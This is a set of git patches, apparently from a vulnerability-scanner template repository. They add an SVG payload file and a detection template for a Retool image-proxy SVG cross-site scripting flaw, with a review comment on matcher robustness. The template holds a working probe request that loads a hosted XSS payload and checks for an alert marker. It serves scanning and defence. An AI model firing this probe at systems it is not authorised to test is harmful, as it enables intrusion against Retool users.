From eb8e32c9393677006c2ea916f2e3010c2bd8e03f Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Thu, 3 Oct 2024 18:33:39 +0530
Subject: [PATCH 1/3] Create retool-xss.svg
---
 helpers/payloads/retool-xss.svg | 8 ++++++++
 1 file changed, 8 insertions(+)
 create mode 100644 helpers/payloads/retool-xss.svg
diff --git a/helpers/payloads/retool-xss.svg b/helpers/payloads/retool-xss.svg
new file mode 100644
index 0000000000..de449b2d48
--- /dev/null
+++ b/helpers/payloads/retool-xss.svg
@@ -0,0 +1,8 @@
+
+
+
+
+
+
From 7e42e2df925b59b801362abd2c9cc94152b91a7d Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Thu, 3 Oct 2024 18:53:43 +0530
Subject: [PATCH 2/3] Create retool-xss.yaml
---
 http/vulnerabilities/retool/retool-xss.yaml | 41 +++++++++++++++++++++
 1 file changed, 41 insertions(+)
 create mode 100644 http/vulnerabilities/retool/retool-xss.yaml
diff --git a/http/vulnerabilities/retool/retool-xss.yaml b/http/vulnerabilities/retool/retool-xss.yaml
new file mode 100644
index 0000000000..982e75ea24
--- /dev/null
+++ b/http/vulnerabilities/retool/retool-xss.yaml
@@ -0,0 +1,41 @@
+id: retool-xss
+
+info:
+ name: Retool 3.88 < - SVG XSS
+ author: iamnoooob,iamnoooob,pdresearch
+ severity: high
+ description: |
+ This template checks for XSS vulnerability via the Image Proxy URL parameter.
+ reference:
+ - https://docs.retool.com/releases/edge/3.88#:~:text=Fixed%20an%20SVG%20XSS%20vulnerability%20by%20adding%20a%20CSP.%20(%2349381)
+ metadata:
+ verified: true
+ max-request: 1
+ fofa-query: body="x-retool"
+ tags: retool,xss
+
+http:
+ - raw:
+ - |
+ GET /api/imageProxy?url=https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/eb8e32c9393677006c2ea916f2e3010c2bd8e03f/helpers/payloads/retool-xss.svg HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "alert('document.domain');"
+ - "'
+ condition: and
+
+ - type: word
+ part: header
+ negative: true
+ words:
+ - "Content-Security-Policy: default-src 'none';"
+
+ - type: status
+ status:
+ - 200
From 1e08dead3a7ac35c9ad31ee7c7369daba62cbe93 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Sat, 5 Oct 2024 13:33:56 +0400
Subject: [PATCH 3/3] Update and rename retool-xss.yaml to retool-svg-xss.yaml
---
 .../retool/{retool-xss.yaml => retool-svg-xss.yaml} | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)
 rename http/vulnerabilities/retool/{retool-xss.yaml => retool-svg-xss.yaml} (84%)
diff --git a/http/vulnerabilities/retool/retool-xss.yaml b/http/vulnerabilities/retool/retool-svg-xss.yaml
similarity index 84%
rename from http/vulnerabilities/retool/retool-xss.yaml
rename to http/vulnerabilities/retool/retool-svg-xss.yaml
index 982e75ea24..ed1b0cda6c 100644
--- a/http/vulnerabilities/retool/retool-xss.yaml
+++ b/http/vulnerabilities/retool/retool-svg-xss.yaml
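Review bot: The negative header matcher near the end of the hunk (`- "Content-Security-Policy: default-src 'none';"`) is a case-sensitive word match, so a patched instance whose stack emits the header name in lower case (which may happen over HTTP/2 or behind a proxy) or without the trailing semicolon would not satisfy the negative condition and the template would report a false positive; adding `case-insensitive: true` to that matcher, or replacing it with `type: regex` and `(?i)content-security-policy:.*default-src 'none'`, makes the check robust to header formatting. The `author:` line lists the same handle twice (`author: iamnoooob,iamnoooob,pdresearch`) and the rename in the third patch keeps it unchanged. The detection also relies on the target's image proxy fetching the payload from raw.githubusercontent.com at commit eb8e32c9, so a target without outbound internet access produces a silent false negative; a sentence in `description` such as `Requires the target to reach raw.githubusercontent.com to fetch the SVG payload.` would make that prerequisite explicit to operators.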
@@ -1,11 +1,11 @@
-id: retool-xss
+id: retool-svg-xss
 info:
- name: Retool 3.88 < - SVG XSS
+ name: Retool < 3.88 - SVG Cross-Site Scripting
 author: iamnoooob,iamnoooob,pdresearch
 severity: high
 description: |
- This template checks for XSS vulnerability via the Image Proxy URL parameter.
+ This template checks for SVG Cross-Site Scripting(XSS) vulnerability via the Image Proxy URL parameter in Retool.
 reference:
 - https://docs.retool.com/releases/edge/3.88#:~:text=Fixed%20an%20SVG%20XSS%20vulnerability%20by%20adding%20a%20CSP.%20(%2349381)
 metadata:
@@ -32,9 +32,9 @@ http:
 - type: word
 part: header
- negative: true
 words:
 - "Content-Security-Policy: default-src 'none';"
+ negative: true
 - type: status
 status: